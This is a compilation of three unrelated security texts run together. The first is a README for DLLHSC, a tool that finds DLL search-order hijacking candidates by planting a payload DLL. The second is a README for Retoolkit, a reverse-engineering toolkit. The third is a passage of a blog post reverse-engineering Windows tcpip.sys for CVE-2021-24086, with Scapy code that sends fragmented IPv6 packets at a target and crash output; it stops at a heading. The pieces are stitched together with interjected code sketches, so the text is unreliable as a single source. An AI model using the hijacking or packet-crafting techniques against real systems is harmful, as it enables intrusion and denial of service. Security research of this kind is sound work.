
DLLHSC - DLL Hijack SCanner - A Tool To Assist With The Discovery Of Suitable Candidates For DLL Hijacking


DLL Hijack SCanner - A tool to generate leads and automate the discovery of candidates for DLL Search Order Hijacking


Contents of this repository

This repository hosts the Visual Studio project file for the tool (DLLHSC), the project file for the API hooking functionality (detour), the project file for the payload and last but not least the compiled executables for x86 and x64 architecture (in the release section of this repo). The code was written and compiled with Visual Studio Community 2019.

If you choose to compile the tool from source, you will need to compile the projects DLLHSC, detour and payload. The DLLHSC project implements the core functionality of this tool. The detour project generates a DLL that is used to hook APIs. And the payload project generates the DLL that is used as a proof of concept to check if the tested executable can load it via search order hijacking. The generated payload has to be placed in the same directory as DLLHSC and detour, and renamed to payload32.dll for the x86 architecture or payload64.dll for x64.


Modes of operation

The tool implements 3 modes of operation which are explained below.


Lightweight Mode

Loads the executable image in memory, parses the Import table and then replaces any DLL referred in the Import table with a payload DLL.

The tool places in the application directory only a module (DLL) that is not already present in the application directory, does not belong to WinSxS and does not belong to the KnownDLLs.

The payload DLL, upon execution, creates a file in the following path: C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSC.tmp as a proof of execution. The tool launches the application and reports whether the payload DLL was executed by checking if the temporary file exists. As some executables import functions from the DLLs they load, error message boxes may show up when the provided DLL fails to export these functions and thus does not meet the dependencies of the provided image. However, these message boxes indicate that the DLL may be a good candidate for payload execution if the dependencies are met; in this case, additional analysis is required. The title of these message boxes may contain the strings Ordinal Not Found or Entry Point Not Found. DLLHSC looks for windows that contain these strings, closes them as soon as they show up and reports the results.
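
To illustrate the window-title detection described above, here is a minimal sketch of my own (not DLLHSC's actual implementation) showing how such error boxes can be found and closed from Python via the Win32 API; the two title strings are the ones mentioned above.

import ctypes
import ctypes.wintypes as wt

user32 = ctypes.windll.user32
WM_CLOSE = 0x0010
TITLES = ('Ordinal Not Found', 'Entry Point Not Found')

def close_error_boxes():
    '''Enumerate top-level windows and close the ones whose title matches.'''
    closed = []

    @ctypes.WINFUNCTYPE(wt.BOOL, wt.HWND, wt.LPARAM)
    def on_window(hwnd, lparam):
        buf = ctypes.create_unicode_buffer(256)
        user32.GetWindowTextW(hwnd, buf, 256)
        if any(title in buf.value for title in TITLES):
            closed.append(buf.value)
            user32.PostMessageW(hwnd, WM_CLOSE, 0, 0)
        return True  # keep enumerating

    user32.EnumWindows(on_window, 0)
    return closed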


List Modules Mode

Creates a process with the provided executable image, enumerates the modules that are loaded in the address space of this process and reports the results after applying filters.

The tool only reports the modules loaded from the System directory that do not belong to the KnownDLLs. The results are leads that require additional analysis. The analyst can then place the reported modules in the application directory and check if the application loads the provided module instead.


Run-Time Mode

Hooks the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours and reports the modules that are loaded in run-time.

Each time the scanned application calls LoadLibrary or LoadLibraryEx, the tool intercepts the call and writes the requested module to the file C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSCRTLOG.tmp. If LoadLibraryEx is specifically called with the flag LOAD_LIBRARY_SEARCH_SYSTEM32, no output is written to the file. After all interceptions have finished, the tool reads the file and prints the results. Of interest for further analysis are modules that do not exist in the KnownDLLs registry key, modules that do not exist in the System directory and modules with no full path (for these modules the loader applies the normal search order).
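
As a rough companion sketch (mine, not part of the tool), and assuming the log simply holds one requested module name or path per line, the filtering criteria described above could be reproduced in Python like this:

import os
import winreg

# Assumption: the run-time log contains one requested module per line.
LOG = os.path.expandvars(r'%LOCALAPPDATA%\Temp\DLLHSCRTLOG.tmp')
SYSTEM32 = os.path.join(os.environ['SystemRoot'], 'System32')

def known_dlls():
    '''Collect the module names listed under the KnownDLLs registry key.'''
    names = set()
    key = r'SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs'
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as k:
        idx = 0
        while True:
            try:
                _, value, _ = winreg.EnumValue(k, idx)
            except OSError:
                break
            names.add(str(value).lower())
            idx += 1
    return names

def interesting_modules(log_path = LOG):
    '''Yield logged modules worth a closer look according to the criteria above.'''
    known = known_dlls()
    for line in open(log_path):
        module = line.strip()
        if not module or os.path.basename(module).lower() in known:
            continue
        has_no_full_path = os.path.basename(module) == module
        lives_in_system32 = os.path.isfile(os.path.join(SYSTEM32, os.path.basename(module)))
        if has_no_full_path or not lives_in_system32:
            yield module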


Compile and Run Guidance

Should you choose to compile the tool from source, it is recommended to do so with Visual Studio 2019. In order for the tool to function properly, the projects DLLHSC, detour and payload have to be compiled for the same architecture and then placed in the same directory. Please note that the DLL generated from the payload project has to be renamed to payload32.dll for the 32-bit architecture or payload64.dll for the 64-bit architecture.


Help menu

The help menu for this application

NAME
dllhsc - DLL Hijack SCanner

SYNOPSIS
dllhsc.exe -h

dllhsc.exe -e <executable image path> (-l|-lm|-rt) [-t seconds]

DESCRIPTION
DLLHSC scans a given executable image for DLL Hijacking and reports the results

It requires elevated privileges

OPTIONS
-h, --help
display this help menu and exit

-e, --executable-image
executable image to scan

-l, --lightweight
parse the import table, attempt to launch a payload and report the results

-lm, --list-modules
list loaded modules that do not exist in the application's directory

-rt, --runtime-load
display modules loaded in run-time by hooking LoadLibrary and LoadLibraryEx APIs

-t, --timeout
number of seconds to wait for checking any popup error windows - defaults to 10 seconds


Example Runs

This section provides examples on how you can run DLLHSC and the results it reports. For this purpose, the legitimate Microsoft utility OleView.exe (MD5: D1E6767900C85535F300E08D76AAC9AB) was used. For better results, it is recommended that the provided executable image is scanned within its installation directory.
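
Putting the synopsis above together, a typical invocation looks like the following (the path below is just a placeholder for wherever the scanned executable lives):

dllhsc.exe -e C:\path\to\OleView.exe -l -t 15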

The flag -l parses the import table of the provided executable, applies filters and attempts to weaponize the imported modules by placing a payload DLL in the application's current directory. The scanned executable may pop an error message box when the dependencies for the payload DLL (exported functions) are not met. DLLHSC checks for 10 seconds by default, or for as many seconds as specified by the user with the flag -t, whether a message box was opened. An error message box indicates that, if the dependencies are met, the module can be weaponized.

The following screenshot shows the error message box generated when OleView.exe loads the payload DLL:



The tool waits for a maximum timeframe of 10 seconds or -t seconds to make sure the process initialization has finished and any message box has been generated. It then detects the message box, closes it and reports the result:



The flag -lm launches the provided executable and prints the modules it loads that neither belong to the KnownDLLs list nor are WinSxS dependencies. This mode aims to give an idea of DLLs that may be used as payload and it only exists to generate leads for the analyst.



The flag -rt prints the modules the provided executable image loads in its address space when launched as a process. This is achieved by hooking the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours.



Feedback

For any feedback on this tool, please use the GitHub Issues section.



Retoolkit - Reverse Engineer's Toolkit


This is a collection of tools you may like if you are interested in reverse engineering and/or malware analysis on x86 and x64 Windows systems. After installing this toolkit you'll have a folder on your desktop with shortcuts to RE tools like these:


Why do I need it?

You don't. Obviously, you can download such tools from their own website and install them by yourself in a new VM. But if you download retoolkit, it can probably save you some time. Additionally, the tools come pre-configured so you'll find things like x64dbg with a few plugins, command-line tools working from any directory, etc. You may like it if you're setting up a new analysis VM.


Download

The *.iss files you see here are the source code for our setup program built with Inno Setup. To download the real thing, you have to go to the Releases section and download the setup program.


Included tools

Check the wiki.



Is it safe to install it in my environment?

I don't know. Some included tools are not open source and come from shady places. You should use it exclusively in virtual machines and under your own responsibility.


Can you add tool X?

It depends. The idea is to keep it simple. We won't add a tool just because it's not here yet. But if you think there's a good reason to do so, and the license allows us to redistribute the software, please file a request here.



Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)

Introduction

Since the beginning of my journey in computer security I have always been amazed and fascinated by true remote vulnerabilities. By true remotes, I mean bugs that are triggerable remotely without any user interaction. Not even a single click. As a result I am always on the lookout for such vulnerabilities.

On the Tuesday 13th of October 2020, Microsoft released a patch for CVE-2020-16898 which is a vulnerability affecting Windows' tcpip.sys kernel-mode driver dubbed Bad neighbor. Here is the description from Microsoft:

A remote code execution vulnerability exists when the Windows TCP/IP stack improperly
handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain
the ability to execute code on the target server or client. To exploit this vulnerability, an attacker would have
to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.
The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement
packets.

The vulnerability really did stand out to me: remote vulnerabilities affecting TCP/IP stacks seemed extinct and being able to remotely trigger a memory corruption in the Windows kernel is very interesting for an attacker. Fascinating.

Not having diffed Microsoft patches in years, I figured it would be a fun exercise to go through. I knew that I wouldn't be the only one working on it as those unicorns get a lot of attention from internet hackers. Indeed, my friend pi3 was so fast to diff the patch, write a PoC and write a blogpost that I didn't even have time to start, oh well :)

That is why when Microsoft blogged about another set of vulnerabilities being fixed in tcpip.sys I figured I might be able to work on those this time. Again, I knew for a fact that I wouldn't be the only one racing to write the first public PoC for CVE-2021-24086 but somehow the internet stayed silent long enough for me to complete this task which is very surprising :)

In this blogpost I will take you on my journey from zero to BSoD: from diffing the patches, to reverse-engineering tcpip.sys, to fighting our way through writing a PoC for CVE-2021-24086. If you came here for the code, fair enough, it is available on my github: 0vercl0k/CVE-2021-24086.

TL;DR

For the readers that want to get the scoop, CVE-2021-24086 is a NULL dereference in tcpip!Ipv6pReassembleDatagram that can be triggered remotely by sending a series of specially crafted packets. The issue happens because of the way the code treats the network buffer:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  // ...
  const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
  const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
  const uint32_t HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // …
  NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
                                        IppReassemblyNetBufferListsComplete,
                                        Reassembly,
                                        0,
                                        0,
                                        0,
                                        0);
  if ( !NetBufferList )
  {
    // ...
    goto Bail_0;
  }

  FirstNetBuffer = NetBufferList->FirstNetBuffer;
  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
  {
    // ...
    goto Bail_1;
  }

  Buffer = (ipv6_header_t *)NdisGetDataBuffer(FirstNetBuffer, HeaderAndOptionsLength, 0i64, 1u, 0);
  //...
  *Buffer = Reassembly->Ipv6;

A fresh NetBufferList (abbreviated NBL) is allocated by NetioAllocateAndReferenceNetBufferAndNetBufferList and NetioRetreatNetBuffer allocates a Memory Descriptor List (abbreviated MDL) of uint16_t(HeaderAndOptionsLength) bytes. This integer truncation from uint32_t is important.

Once the network buffer has been allocated, NdisGetDataBuffer is called to gain access to a contiguous block of data from the fresh network buffer. This time though, HeaderAndOptionsLength is not truncated which allows an attacker to trigger a special condition in NdisGetDataBuffer to make it fail. This condition is hit when uint16_t(HeaderAndOptionsLength) != HeaderAndOptionsLength. When the function fails, it returns NULL and Ipv6pReassembleDatagram blindly trusts this pointer and does a memory write, bugchecking the machine. To pull this off, you need to trick the network stack into receiving an IPv6 fragment with a very large amount of headers. Here is what the bugchecks look like:

trigger
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
                       (0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805`473c46a0 cc              int     3

kd> kc
 # Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
07 tcpip!Ipv6pReceiveFragment
08 tcpip!Ipv6pReceiveFragmentList
09 tcpip!IppReceiveHeaderBatch
0a tcpip!IppFlcReceivePacketsCore
0b tcpip!IpFlcReceivePackets
0c tcpip!FlpReceiveNonPreValidatedNetBufferListChain
0d tcpip!FlReceiveNetBufferListChainCalloutRoutine
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
10 tcpip!FlReceiveNetBufferListChain
11 NDIS!ndisMIndicateNetBufferListsToOpen
12 NDIS!ndisMTopReceiveNetBufferLists

For anybody else in for a long ride, let's get to it :)

Recon

Even though Francisco Falcon already wrote a cool blogpost discussing his work on this case, I have decided to also write up mine; I'll try to cover aspects that are less or not covered in his post like tcpip.sys internals for example.

All right, let's start at the beginning: at this point I don't know anything about tcpip.sys and I don't know anything about the bugs getting patched. Microsoft's blogpost is helpful because it gives us a bunch of clues:

  • There are three different vulnerabilities that seemed to involve fragmentation in IPv4 & IPv6,
  • Two of them are rated as Remote Code Execution which means that they cause memory corruption somehow,
  • One of them causes a DoS which means somehow it likely bugchecks the target.

According to this tweet we also learn that those flaws have been internally found by Microsoft's own @piazzt which is awesome.

Googling around also reveals a bunch more useful information, as it would seem that Microsoft privately shared PoCs with their partners via the MAPP program.

At this point I decided to focus on the DoS vulnerability (CVE-2021-24086) as a first step. I figured it might be easier to trigger and that I might be able to use the knowledge acquired while triggering it to better understand tcpip.sys, and maybe work on the other ones if time and motivation allowed.

The next logical step is to diff the patches to identify the fixes.

Diffing Microsoft patches in 2021

I honestly can't remember the last time I diff'd Microsoft patches. Probably Windows XP / Windows 7 time to be honest. Since then, a lot has changed though. The security updates are now cumulative, which means that packages embed every fix known to date. You can grab packages directly from the Microsoft Update Catalog which is handy. Last but not least, Windows Updates now use forward / reverse differentials; you can read this to know more about what it means.

Extracting and Diffing Windows Patches in 2020 is a great blog post that talks about how to unpack the patches off an update package and how to apply the differentials. The output of this work is basically the tcpip.sys binary before and after the update. If you don't feel like doing this yourself, I've uploaded the two binaries (as well as their respective public PDBs) that you can use to do the diffing yourself: 0vercl0k/CVE-2021-24086/binaries. Also, I have been made aware after publishing this post about the amazing winbindex website which indexes Windows binaries and lets you download them in a click. Here is the index available for tcpip.sys as an example.

Once we have the before and after binaries, a little dance with IDA and the good ol’ BinDiff yields the below:

[image: bindiff]

There aren't a whole lot of changes to look at which is nice, and focusing on Ipv6pReassembleDatagram feels right. Microsoft's workaround mentioned disabling packet reassembly (netsh int ipv6 set global reassemblylimit=0) and this function seems to be reassembling datagrams; close enough right?

After looking at it for a little time, the patched binary introduced this new interesting looking basic block:

[image: bindiff]

It ends with what looks like a comparison with the 0xffff integer and a conditional jump that either bails out or keeps going. This looks very interesting because some articles mentioned that the bug could be triggered with a packet containing a large amount of headers. Not that you should trust those types of news articles as they are usually not technically accurate and sensationalized, but there might be some truth to it. At this point, I felt pretty good about it and decided to stop diffing and start reverse-engineering. I assumed the issue would be some sort of integer overflow / truncation that would be easy to trigger based on the name of the function. We just need to send a big packet right?

Reverse-engineering tcpip.sys

This is where the real journey starts, along with the usual emotional rollercoaster that comes with studying vulnerabilities. I initially thought I would be done with this in a few days, or a week. Oh boy, I was wrong though.

Baby steps

First thing I did was to prepare a lab environment. I installed a Windows 10 (target) and a Linux VM (attacker), set up KDNet and kernel debugging to debug the target, installed Wireshark / Scapy (v2.4.4), and created a virtual switch which the two VMs share. And... finally loaded tcpip.sys in IDA. The module looked pretty big and complex at first sight - no big surprise there; it implements Windows' IPv4 & IPv6 network stack after all. I started the adventure by focusing first on Ipv6pReassembleDatagram. Here is the piece of assembly code that we saw earlier in BinDiff and that looked interesting:

[image: ida]

Great, that's a start. Before going deep down the rabbit hole of reverse-engineering, I decided to try to hit the function and be able to debug it with WinDbg. As the function name suggests reassembly I wrote the following code and threw it against my target:

from scapy.all import *

pkt = Ether() / IPv6(dst = 'ff02::1') / UDP() / ('a' * 0x1000)
sendp(fragment6(pkt, 500), iface = 'eth1')

This successfully triggers the breakpoint in WinDbg; neat:

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff802`2edcdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> kc
 # Call Site
00 tcpip!Ipv6pReassembleDatagram
01 tcpip!Ipv6pReceiveFragment
02 tcpip!Ipv6pReceiveFragmentList
03 tcpip!IppReceiveHeaderBatch
04 tcpip!IppFlcReceivePacketsCore
05 tcpip!IpFlcReceivePackets
06 tcpip!FlpReceiveNonPreValidatedNetBufferListChain
07 tcpip!FlReceiveNetBufferListChainCalloutRoutine
08 nt!KeExpandKernelStackAndCalloutInternal
09 nt!KeExpandKernelStackAndCalloutEx
0a tcpip!FlReceiveNetBufferListChain

We can even observe the fragmented packets in Wireshark which is also pretty cool:

[image: wireshark]

For those that are not familiar with packet fragmentation, it is a mechanism used to chop large packets (larger than the Maximum Transmission Unit) in smaller chunks to be able to be sent across network equipment. The receiving network stack has the burden to stitch them all together in a safe manner (winkwink).

All right, perfect. We have now what I consider a good enough research environment and we can start digging deep into the code. At this point, let's not focus on the vulnerability yet but instead try to understand how the code works, the type of arguments it receives, recover structures and the semantics of important fields, etc. Let's get our HexRays decompilation output pretty.

As you might imagine, this is the part that's the most time consuming. I use a mixture of bottom-up and top-down approaches, and loads of experiments: commenting the decompiled code as best as I can, challenging myself by asking questions, answering them, rinse & repeat.

High level overview

Oftentimes, studying code / features in isolation in complex systems is not enough; it only takes you so far. Complex drivers like tcpip.sys are gigantic, carry a lot of state, and are hard to reason about, both in terms of execution and data flow. In this case, there is this sort of size integer that seems to be related to something that got received, and we want to set it to 0xffff. Unfortunately, just focusing on Ipv6pReassembleDatagram and Ipv6pReceiveFragment was not enough for me to make significant progress. It was worth a try, but time to switch gears.

Zooming out

All right, that's cool, our HexRays decompiled code is getting prettier and prettier; it feels rewarding. We have abused the create new structure feature to lift a bunch of structures. We guessed about the semantics of some of them but most are still unknown. So yeah, let's work smarter.

We know that tcpip.sys receives packets from the network; we don't know exactly how or where from, but maybe we don't need to know that much. One of the first questions you might ask yourself is: how does the kernel store network data? What structures does it use?

NET_BUFFER & NET_BUFFER_LIST

If you have some Windows kernel experience, you might be familiar with NDIS and you might also have heard about some of the APIs and the structures it exposes to users. It is documented because third-parties can develop extensions and drivers to interact with the network stack at various points.

An important structure in this world is NET_BUFFER. This is what it looks like in WinDbg:

kd> dt NDIS!_NET_BUFFER
NDIS!_NET_BUFFER
   +0x000 Next             : Ptr64 _NET_BUFFER
   +0x008 CurrentMdl       : Ptr64 _MDL
   +0x010 CurrentMdlOffset : Uint4B
   +0x018 DataLength       : Uint4B
   +0x018 stDataLength     : Uint8B
   +0x020 MdlChain         : Ptr64 _MDL
   +0x028 DataOffset       : Uint4B
   +0x000 Link             : _SLIST_HEADER
   +0x000 NetBufferHeader  : _NET_BUFFER_HEADER
   +0x030 ChecksumBias     : Uint2B
   +0x032 Reserved         : Uint2B
   +0x038 NdisPoolHandle   : Ptr64 Void
   +0x040 NdisReserved     : [2] Ptr64 Void
   +0x050 ProtocolReserved : [6] Ptr64 Void
   +0x080 MiniportReserved : [4] Ptr64 Void
   +0x0a0 DataPhysicalAddress : _LARGE_INTEGER
   +0x0a8 SharedMemoryInfo : Ptr64 _NET_BUFFER_SHARED_MEMORY
   +0x0a8 ScatterGatherList : Ptr64 _SCATTER_GATHER_LIST

It can look overwhelming but we don't need to understand every detail. What is important is that the network data is stored in a regular MDL. Like MDLs, NET_BUFFERs can be chained together, which allows the kernel to store a large amount of data in a bunch of non-contiguous chunks of physical memory; virtual memory is the magic wand used to make the data look contiguous. For the readers that are not familiar with Windows kernel development, an MDL is a Windows kernel construct that allows users to map physical memory into a contiguous virtual memory region. Every MDL is actually followed by a list of PFNs (which don't need to be contiguous) that the Windows kernel is able to map into a contiguous virtual memory region; magic.

kd> dt nt!_MDL
   +0x000 Next             : Ptr64 _MDL
   +0x008 Size             : Int2B
   +0x00a MdlFlags         : Int2B
   +0x00c AllocationProcessorNumber : Uint2B
   +0x00e Reserved         : Uint2B
   +0x010 Process          : Ptr64 _EPROCESS
   +0x018 MappedSystemVa   : Ptr64 Void
   +0x020 StartVa          : Ptr64 Void
   +0x028 ByteCount        : Uint4B
   +0x02c ByteOffset       : Uint4B

NET_BUFFER_LIST is basically a structure to keep track of a list of NET_BUFFERs, as the name suggests:

kd> dt NDIS!_NET_BUFFER_LIST
   +0x000 Next             : Ptr64 _NET_BUFFER_LIST
   +0x008 FirstNetBuffer   : Ptr64 _NET_BUFFER
   +0x000 Link             : _SLIST_HEADER
   +0x000 NetBufferListHeader : _NET_BUFFER_LIST_HEADER
   +0x010 Context          : Ptr64 _NET_BUFFER_LIST_CONTEXT
   +0x018 ParentNetBufferList : Ptr64 _NET_BUFFER_LIST
   +0x020 NdisPoolHandle   : Ptr64 Void
   +0x030 NdisReserved     : [2] Ptr64 Void
   +0x040 ProtocolReserved : [4] Ptr64 Void
   +0x060 MiniportReserved : [2] Ptr64 Void
   +0x070 Scratch          : Ptr64 Void
   +0x078 SourceHandle     : Ptr64 Void
   +0x080 NblFlags         : Uint4B
   +0x084 ChildRefCount    : Int4B
   +0x088 Flags            : Uint4B
   +0x08c Status           : Int4B
   +0x08c NdisReserved2    : Uint4B
   +0x090 NetBufferListInfo : [29] Ptr64 Void

Again, no need to understand every detail, thinking in concepts is good enough. On top of that, Microsoft makes our life easier by providing a very useful WinDbg extension called ndiskd. It exposes two functions to dump NET_BUFFER and NET_BUFFER_LIST: !ndiskd.nb and !ndiskd.nbl respectively. These are a big time saver because they'll take care of walking the various levels of indirection: list of NET_BUFFERs and chains of MDLs.

The mechanics of parsing an IPv6 packet

Now that we know where and how network data is stored, we can ask ourselves how IPv6 packet parsing works. I have very little knowledge about networking, but I know that there are various headers that need to be parsed differently and that they can be chained together: layer N tells you what you'll find next.

What I am about to describe is what I have figured out while reverse-engineering as well as what I have observed while debugging it through a bazillion experiments. Full disclosure: I am no expert, so take it with a grain of salt :)

The top level function of interest is IppReceiveHeaderBatch. The first thing it does is invoke IppReceiveHeadersHelper on every packet in the list:

if ( Packet )
{
    do
    {
        Next = Packet->Next;
        Packet->Next = 0;
        IppReceiveHeadersHelper(Packet, Protocol, ...);
        Packet = Next;
    }
    while ( Next );
}

Packet_t is an undocumented structure that is associated with received packets. A bunch of state is stored in this structure and figuring out the semantics of its important fields is time consuming. IppReceiveHeadersHelper's main role is to kick off the parsing machine. It parses the IPv6 (or IPv4) header of the packet and reads the next_header field. As I mentioned above, this field is very important because it indicates how to read the next layer of the packet. This value is kept in the Packet structure, and a bunch of functions read and update it during parsing.

NetBufferList = Packet->NetBufferList;
HeaderSize = Protocol->HeaderSize;
FirstNetBuffer = NetBufferList->FirstNetBuffer;
CurrentMdl = FirstNetBuffer->CurrentMdl;
if ( (CurrentMdl->MdlFlags & 5) != 0 )
    Va = CurrentMdl->MappedSystemVa;
else
    Va = MmMapLockedPagesSpecifyCache(CurrentMdl, 0, MmCached, 0, 0, 0x40000000u);
IpHdr = (ipv6_header_t *)((char *)Va + FirstNetBuffer->CurrentMdlOffset);
if ( Protocol == (Protocol_t *)Ipv4Global )
{
    // ...
}
else
{
    Packet->NextHeader = IpHdr->next_header;
    Packet->NextHeaderPosition = offsetof(ipv6_header_t, next_header);
    SrcAddrOffset = offsetof(ipv6_header_t, src);
}

The function does a lot more; it initializes several Packet_t fields but let's ignore that for now to avoid getting overwhelmed by complexity. Once the function returns back in IppReceiveHeaderBatch, it extracts a demuxer off the Protocol_t structure and invokes a parsing callback if the NextHeader is a valid extension header. The Protocol_t structure holds an array of Demuxer_t (term used in the driver).

struct Demuxer_t
{
  void (__fastcall *Parse)(Packet_t *);
  void *f0;
  void *f1;
  void *Size;
  void *f3;
  _BYTE IsExtensionHeader;
  _BYTE gap[23];
};

struct Protocol_t
{
  // ...
  Demuxer_t Demuxers[277];
};

NextHeader (populated earlier in IppReceiveHeaderBatch) is the value used to index into this array.

[image: ida43]

If the demuxer is handling an extension header, then a callback is invoked to parse the header properly. This happens in a loop until the parsing hits the first part of the packet that isn't a header, in which case it moves on to the next packet.

while ( ... )
{
    NetBufferList = RcvList->NetBufferList;
    IpProto = RcvList->NextHeader;
    if ( ... )
    {
        Demuxer = (Demuxer_t *)IpUdpEspDemux;
    }
    else
    {
        Demuxer = &Protocol->Demuxers[IpProto];
    }
    if ( !Demuxer->IsExtensionHeader )
        Demuxer = 0;
    if ( Demuxer )
        Demuxer->Parse(RcvList);
    else
        RcvList = RcvList->Next;
}

Makes sense - that's kinda how we would implement parsing of IPv6 packets as well right?

[image: ida1]

It is easy to dump the demuxers and their associated NextHeader / Parse values; these might come in handy later (the snippet after the list shows them in action).

- nh = 0  -> Ipv6pReceiveHopByHopOptions
- nh = 43 -> Ipv6pReceiveRoutingHeader
- nh = 44 -> Ipv6pReceiveFragmentList
- nh = 60 -> Ipv6pReceiveDestinationOptions
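
As a quick sanity check of this table, here is a small Scapy snippet of mine (not from the post) that chains these extension headers with every nh field set explicitly to the protocol number of the layer that follows; these are exactly the values IppReceiveHeaderBatch uses to pick a demuxer (17 being UDP, which is not an extension header and therefore ends the loop).

from scapy.all import IPv6, IPv6ExtHdrHopByHop, IPv6ExtHdrDestOpt, IPv6ExtHdrFragment, UDP

# Header chain: IPv6(nh=0) -> Hop-by-Hop(nh=60) -> Destination Options(nh=44)
# -> Fragment(nh=17) -> UDP. Each nh points at the layer that comes right after it.
pkt = IPv6(dst = 'ff02::1', nh = 0) \
    / IPv6ExtHdrHopByHop(nh = 60) \
    / IPv6ExtHdrDestOpt(nh = 44) \
    / IPv6ExtHdrFragment(nh = 17, id = 0x1337, m = 0, offset = 0) \
    / UDP(sport = 0x1122, dport = 0x3344)

pkt.show2()  # build the packet and dump the resolved next-header chain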

A demuxer can expose a callback routine for parsing, which I called Parse. The Parse method receives a Packet and is free to update its state; for example, to grab the NextHeader that is needed to know how to parse the next layer. This is what Ipv6pReceiveFragmentList looks like (Ipv6FragmentDemux.Parse):

[image: ida1]

It makes sure the next header is IPPROTO_FRAGMENT before going further. Again, makes sense.

The mechanics of IPv6 fragmentation

Now that we understand the overall flow a bit more, it is a good time to start thinking about fragmentation. We know we need to send fragmented packets to hit the code that was fixed by the update, which we know is important somehow. The function that parses fragments is Ipv6pReceiveFragment and it is hairy. Again, keeping track of fragments probably warrants that, so nothing unexpected here.

It's also the right time for us to read literature about how exactly IPv6 fragmentation works. Concepts have been useful until now, but at this point we need to understand the nitty-gritty details. I don't want to spend too much time on this as there is tons of content online discussing the subject so I'll just give you the fast version. To define a fragment, you need to add a fragmentation header which is called IPv6ExtHdrFragment in Scapy land:

class IPv6ExtHdrFragment(_IPv6ExtHdr):
    name = "IPv6 Extension Header - Fragmentation header"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   BitField("res1", 0, 8),
                   BitField("offset", 0, 13),
                   BitField("res2", 0, 2),
                   BitField("m", 0, 1),
                   IntField("id", None)]
    overload_fields = {IPv6: {"nh": 44}}

The most important fields for us are :

  • offset which tells the start offset of where the data that follows this header should be placed in the reassembled packet
  • the m bit that specifies whether or not this is the last fragment.

Note that the offset field is an amount of 8 bytes blocks; if you set it to 1, it means that your data will be at +8 bytes. If you set it to 2, they'll be at +16 bytes, etc.

Here is a small ghetto IPv6 fragmentation function I wrote to ensure I was understanding things properly. I enjoy learning through practice. (Scapy has fragment6):

def frag6(target, frag_id, bytes, nh, frag_size = 1008):
    '''Ghetto fragmentation.'''
    assert (frag_size % 8) == 0
    leftover = bytes
    offset = 0
    frags = []
    while len(leftover) > 0:
        chunk = leftover[: frag_size]
        leftover = leftover[len(chunk): ]
        last_pkt = len(leftover) == 0
        # 0 -> No more / 1 -> More
        m = 0 if last_pkt else 1
        assert offset < 8191
        pkt = Ether() \
            / IPv6(dst = target) \
            / IPv6ExtHdrFragment(m = m, nh = nh, id = frag_id, offset = offset) \
            / chunk

        offset += (len(chunk) // 8)
        frags.append(pkt)
    return frags

Easy enough. The other important aspect of fragmentation in the literature is related to IPv6 headers and what is called the unfragmentable part of a packet. Here is how Microsoft describes the unfragmentable part: "This part consists of the IPv6 header, the Hop-by-Hop Options header, the Destination Options header for intermediate destinations, and the Routing header". It also is the part that precedes the fragmentation header. Obviously, if there is an unfragmentable part, there is a fragmentable part. Easy, the fragmentable part is what you are sending behind the fragmentation header. The reassembly process is the process of stitching together the unfragmentable part with the reassembled fragmentable part into one beautiful reassembled packet. Here is a diagram taken from Understanding the IPv6 Header that sums it up pretty well:

[image: msftpress]
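
To make the unfragmentable / fragmentable split concrete, here is a small Scapy sketch of mine (with explicit nh values, and assuming the same eth1 attacker interface as the rest of the post): two fragments of the same datagram, where the IPv6 header plus a Destination Options header form the unfragmentable part repeated in front of each fragmentation header, while the UDP datagram behind the fragmentation header is what actually gets split and reassembled.

from scapy.all import Ether, IPv6, IPv6ExtHdrDestOpt, IPv6ExtHdrFragment, UDP, PadN, sendp

frag_id = 0x1337
# Unfragmentable part: IPv6 header + Destination Options (nh=44 because the
# fragmentation header comes next). It is repeated in both fragments.
unfrag = IPv6(dst = 'ff02::1', nh = 60) / IPv6ExtHdrDestOpt(nh = 44, options = [PadN(optdata = b'a' * 8)])

# Fragmentable part: a 24-byte UDP datagram (len covers the reassembled datagram,
# checksum left at 0 for this illustration), split into 16 bytes + 8 bytes.
first = Ether() / unfrag \
    / IPv6ExtHdrFragment(id = frag_id, m = 1, nh = 17, offset = 0) \
    / bytes(UDP(sport = 0x1122, dport = 0x3344, len = 24, chksum = 0) / (b'A' * 8))
second = Ether() / unfrag \
    / IPv6ExtHdrFragment(id = frag_id, m = 0, nh = 17, offset = 2) \
    / (b'B' * 8)

sendp([first, second], iface = 'eth1')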

All of this theoretical information is very useful because we can now look for those details while we reverse-engineer. It is always easier to read code and try to match it against what it is supposed or expected to do.

Theory vs practice: Ipv6pReceiveFragment

